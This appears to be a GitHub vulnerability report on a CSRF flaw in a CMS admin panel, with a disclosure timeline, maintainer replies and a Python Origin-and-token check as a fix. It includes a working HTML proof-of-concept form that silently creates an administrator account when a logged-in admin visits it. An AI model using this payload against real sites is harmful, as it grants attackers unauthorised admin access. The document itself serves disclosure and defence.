CSRF issue that allows attacker to create an account
Hello. I'd like to report a security issue on the admin page.
Summary
This vulnerability is a CSRF vulnerability that allows creating any kind of account.
When an attacker induces authorized victims to visit a malicious webpage and makes them send requests, the victim creates an account without their intent.
Reproduce
These are the steps to reproduce.
- Access the HTML page containing the payload after you log in to the admin (/en_US/admin/) page.
Then you will find that an admin account named [test] has been created.
Payloads
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="email" value="test@example.com" />
<input type="hidden" name="web" value="" />
<input type="hidden" name="locale" value="" />
<input type="hidden" name="status" value="0" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="password" value="testtest" />
<input type="hidden" name="password2" value="testtest" />
<input type="hidden" name="roles[_ids]" value="" />
<input type="hidden" name="roles[_ids][]" value="1" />
<input type="hidden" name="welcome_message" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I think this security issue is not serious, because an attack using this vulnerability requires inducing the victim.
Event
- 2018-03-15: this vulnerability was discovered.
- 2018-03-27: opened an issue on GitHub.
Fixing CSRF in QACMS in general may produce several problems as QACMS heavily relies on AJAX and dynamic forms building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.
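To show what a fix for the PoC above would need to check, and how the AJAX/dynamic-form concern in the previous comment can be handled, here is an added example of a synchronizer-token CSRF check. It is not QACMS or CakePHP code; the hostname is taken from the PoC form, and the header/field names, session dict and sample requests are assumptions constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Added defensive example (not QACMS code). The token may arrive either as a
# hidden form field or as an X-CSRF-Token header, so AJAX callers and
# dynamically built forms can pass it without a hidden input in every form.
SITE_ORIGIN = "http://your.cms.domain.example.com"  # hostname from the PoC form
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # read-only methods are not checked


def issue_token(session):
    """Create (once per session) the random token the server renders into forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_check(method, headers, form, session):
    """Return (allowed, reason); both checks must pass for state-changing requests."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # 1. Origin/Referer check: a form auto-submitted from an attacker's page
    #    carries the attacker's origin, so it is rejected before the token check.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False, "no Origin or Referer header"
    parsed = urlparse(source)
    origin = f"{parsed.scheme}://{parsed.netloc}"
    if origin != SITE_ORIGIN:
        return False, f"cross-site request from {origin}"
    # 2. Synchronizer token from field or header, compared in constant time.
    submitted = form.get("_csrfToken") or headers.get("X-CSRF-Token")
    expected = session.get("csrf_token")
    if not submitted or not expected or not hmac.compare_digest(submitted, expected):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed samples: the PoC submission (foreign Origin, no token) versus a
# legitimate form post and an AJAX call made from the CMS's own admin pages.
ADMIN_SESSION = {}
TOKEN = issue_token(ADMIN_SESSION)
POC_FORM = {"name": "test", "username": "test", "password": "testtest", "roles[_ids][]": "1"}
POC_RESULT = csrf_check("POST", {"Origin": "http://attacker.example"}, POC_FORM, ADMIN_SESSION)
LEGIT_FORM = csrf_check("POST", {"Origin": SITE_ORIGIN}, {**POC_FORM, "_csrfToken": TOKEN}, ADMIN_SESSION)
LEGIT_AJAX = csrf_check("POST", {"Origin": SITE_ORIGIN, "X-CSRF-Token": TOKEN}, POC_FORM, ADMIN_SESSION)
```

The PoC request fails the Origin check before the token is even inspected, while the same form data with the session's token, sent from the CMS's own origin, is accepted either way.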
@ChristopherCastro do you plan to address this? Note that a CVE was assigned to this issue. If you disagree with the assignment you may contact MITRE directly to reject the CVE.